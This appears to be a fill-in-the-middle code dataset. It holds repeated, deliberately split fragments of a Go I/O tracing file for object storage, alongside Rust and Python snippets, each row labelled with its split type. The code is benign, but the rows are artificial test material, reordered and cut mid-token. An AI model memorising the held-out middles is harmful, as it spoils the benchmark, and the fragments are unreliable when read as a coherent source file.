Value::Output(mut job_output) =>
handle_row(row, &config, &mut job_output.stream, printer, env, &input, &writer_output)?,
Value::Rows(mut rows) =>
handle_row(row, &config, &mut RowsReader::new(rows), printer, env, &input, &writer_output)?,
_ => {
printer.job_error(error("Wrong column type"));
break;
}
}
}
Err(_) => { break; }
}
}
drop(writer_output);
writer_handle.join(printer);
Ok(())
}
fn perform_on(arguments:
|
Ok(())
|
random_line_split
|
obj_io_tracing_on.go
|
traces;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
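// Usage sketch (added for illustration; vfs.Default, the file number and the wrapped
// Readable are assumptions, not part of this file):
//
//	t := Open(vfs.Default, "/path/to/trace-dir")
//	defer t.Close()
//	r = t.WrapReadable(ctx, r, fileNum) // r is an existing objstorage.Readable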
// WrapWritable wraps an objstorage.Writable with one that generates tracing
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even though all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle)
|
(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
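// (added note) mergeCtxInfo treats the zero value of each field as "unset": any field
// the per-call context does not set falls back to the generator's base info.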
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
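// Composition sketch (added): the With* helpers stack on a single context, and
// mergeCtxInfo lets per-call values override the event generator's base values.
//
//	ctx = WithLevel(WithReason(ctx, reason), 3) // reason: some Reason value (assumption)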
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.Block
|
RecordCacheHit
|
identifier_name
|
obj_io_tracing_on.go
|
traces;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
// WrapWritable wraps an objstorage.Writable with one that generates tracing
|
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even though all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
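// The With* helpers above layer ctxInfo onto a context, and mergeCtxInfo lets a
// per-call context override only the fields it sets, falling back to the
// generator's base context for the rest. A hypothetical sketch (the reason and
// block type arguments are placeholders, not constants defined here):
func readWithTags(rh objstorage.ReadHandle, reason Reason, bt BlockType, buf []byte) (int, error) {
	ctx := WithReason(context.Background(), reason)
	ctx = WithBlockType(ctx, bt)
	ctx = WithLevel(ctx, 3) // stored as levelPlusOne=4 so that zero still means "unset"
	return rh.ReadAt(ctx, buf, 0)
}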
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
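// For a rough sense of scale (eventSize depends on the Event layout; 48 bytes
// is a hypothetical figure): targetEntriesPerFile would be 256*1024*1024/48 ≈ 5.6M
// events per trace file, and channelBufSize = 512*1024/16 = 32768 eventBufs,
// i.e. 512K events buffered in the channel, matching the comment above.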
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.BlockType =
|
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
|
random_line_split
|
obj_io_tracing_on.go
|
.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even though all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.BlockType = info.blockType
e.LevelPlusOne = info.levelPlusOne
if g.buf.num == eventsPerBuf {
g.flush()
}
g.buf.events[g.buf.num] = e
g.buf.num++
}
type workerState struct {
curFile vfs.File
curBW *bufio.Writer
numEntriesInFile int
}
func (t *Tracer) workerLoop() {
defer t.workerWait.Done()
stopCh := t.workerStopCh
dataCh := t.workerDataCh
var state workerState
t.workerNewFile(&state)
for {
select {
case <-stopCh:
close(dataCh)
// Flush any remaining traces.
for data := range dataCh {
t.workerWriteTraces(&state, data)
}
t.workerCloseFile(&state)
return
case data := <-dataCh:
t.workerWriteTraces(&state, data)
}
}
}
func (t *Tracer) workerWriteTraces(state *workerState, data eventBuf) {
if state.numEntriesInFile >= targetEntriesPerFile {
t.workerCloseFile(state)
t.workerNewFile(state)
}
state.numEntriesInFile += data.num
p := unsafe.Pointer(&data.events[0])
b := unsafe.Slice((*byte)(p), eventSize*data.num)
if _, err := state.curBW.Write(b); err != nil {
panic(err)
}
}
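// workerWriteTraces dumps each Event verbatim (host byte order, no framing), so
// a trace file can be decoded by reinterpreting the bytes the same way. A
// hypothetical reader sketch, not part of this package (assumes "os" is
// imported and the file was written on the same architecture):
func readTraceFile(path string) ([]Event, error) {
	b, err := os.ReadFile(path)
	if err != nil {
		return nil, err
	}
	n := len(b) / eventSize
	events := make([]Event, n)
	if n > 0 {
		copy(unsafe.Slice((*byte)(unsafe.Pointer(&events[0])), n*eventSize), b)
	}
	return events, nil
}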
func (t *Tracer) workerNewFile(state *workerState) {
filename := fmt.Sprintf("IOTRACES-%s", time.Now().UTC().Format(time.RFC3339Nano))
file, err := t.fs.Create(t.fs.PathJoin(t.fsDir, filename))
if err != nil {
panic(err)
}
file = vfs.NewSyncingFile(file, vfs.SyncingFileOptions{
BytesPerSync: bytesPerFileSync,
})
state.curFile = file
state.curBW = bufio.NewWriter(file)
state.numEntriesInFile = 0
}
func (t *Tracer) workerCloseFile(state *workerState) {
if state.curFile != nil {
if err := state.curBW.Flush(); err != nil
|
{
panic(err)
}
|
conditional_block
|
|
obj_io_tracing_on.go
|
;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
// WrapWritable wraps an objstorage.Writable with one that generates tracing
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even though all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error
|
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.Block
|
{
r.mu.g.flush()
return r.r.Close()
}
|
identifier_body
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon-mode processes can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
